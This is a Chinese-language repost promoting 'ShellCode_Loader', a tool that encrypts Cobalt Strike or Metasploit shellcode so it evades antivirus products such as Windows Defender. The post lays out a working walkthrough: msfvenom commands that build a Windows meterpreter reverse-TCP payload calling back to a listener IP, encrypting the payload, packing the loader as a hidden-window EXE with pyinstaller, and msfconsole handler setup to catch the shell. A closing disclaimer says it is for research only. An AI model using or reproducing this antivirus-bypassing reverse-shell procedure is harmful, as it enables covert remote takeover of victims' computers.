CobaltStrike免杀ShellCode加载器

luozhenni

​
CobaltStrike免杀ShellCode加载器
原文链接：CobaltStrike免杀ShellCode加载器
Axx8 web安全工具库 2022-09-13 00:00 发表于河南

项目作者：Axx8
项目地址：https://github.com/Axx8/ShellCode_Loader

0x01 工具介绍

ShellCode_Loader - Msf
CobaltStrike免杀ShellCode加载器
Shellcode_encryption - 免杀Shellcode加密生成工具
目前测试免杀360&火绒&电脑管家&Windows Defender（其他杀软未测试）。


0x02 安装与使用

1、生成Msf_Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload.c
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f py -o  payload_py.c

2、生成CobaltStrike_Payload

​

编辑
选择使用x64的C语言或Python语言的Shellcode。

​

编辑

得到一个payload.c的文件，内容为：

​

编辑
3、加密Payload
Shellcode_encryption.exe    payload.c

​

编辑
4、配置ShellCode加载器，将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode' 处 示例：

​

编辑
5、打包可执行程序(EXE编译环境)，生成ShellCode_Loader.exe在dist目录中

1. Python 3.8.6
   
2. pyinstaller 4.7
   
3. pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
   
4. pyinstaller -F -w ShellCode_Loader.py

复制代码

6、上线测试
运行监听

1. msfconsole
   
2. msf6 > use exploit/multi/handler
   
3. msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
   
4. msf6 exploit(multi/handler) > set lhost 0.0.0.0
   
5. msf6 exploit(multi/handler) > set lport 8080
   
6. msf6 exploit(multi/handler) > run

复制代码

​

​

编辑

​

编辑

0x03 下载地址

1、通过项目地址下载
2、关注web安全工具库公众号，后台回复：20220913

0x04 声明

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者不承担任何法律及连带责任。

​